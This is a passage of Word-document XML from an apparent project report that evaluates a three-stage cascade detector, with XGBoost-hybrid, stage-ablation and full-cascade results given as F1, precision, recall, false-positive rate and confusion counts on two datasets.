      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch8_4_cascade_forensics.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>), which fits the two component models</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>once and then derives every routing variant from the cached stage-1 anomaly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>scores and stage-2 probabilities. The routing rule is deterministic given</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>those two arrays, so the ablations below are exact reproductions of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CascadeDetector.predict_with_trace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>, not re-runs with different seeds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The verdict first</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The cascade is the architecture the assignment recommends: a cheap unsupervised</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>filter clears obvious benign traffic, a supervised model classifies the rest,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and an LLM arbitrates the residue. We built it, measured it, and it does not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>work — not marginally, and not for the reason we expected.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Dataset 1 (n = 3,049)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>precision</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>recall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FPR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tn / fp / fn / tp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>XGBoost-hybrid alone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8761</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8755</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8766</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0415</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2192 / 95 / 94 / 668</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>stage 1 + 2 (no arbitration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8737</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8760</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8714</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0411</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2193 / 94 / 98 / 664</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>stage 2 + 3 (no pre-filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8716</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.9088</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8373</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0280</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2223 / 64 / 124 / 638</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>full three-stage cascade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8685</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.9083</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8320</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0280</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2223 / 64 / 128 / 634</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r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dataset 2 (n = 1,915)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>precision</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>recall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FPR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tn / fp / fn / tp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>XGBoost-hybrid alone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8482</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8508</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8455</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0494</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1365 / 71 / 74 / 405</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>stage 1 + 2 (no arbitration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8463</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8535</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8392</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0481</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1367 / 69 / 77 / 402</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>stage 2 + 3 (no pre-filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8415</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8830</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8038</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0355</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1385 / 51 / 94 / 385</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>full three-stage cascade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8396</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8863</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7975</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0341</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
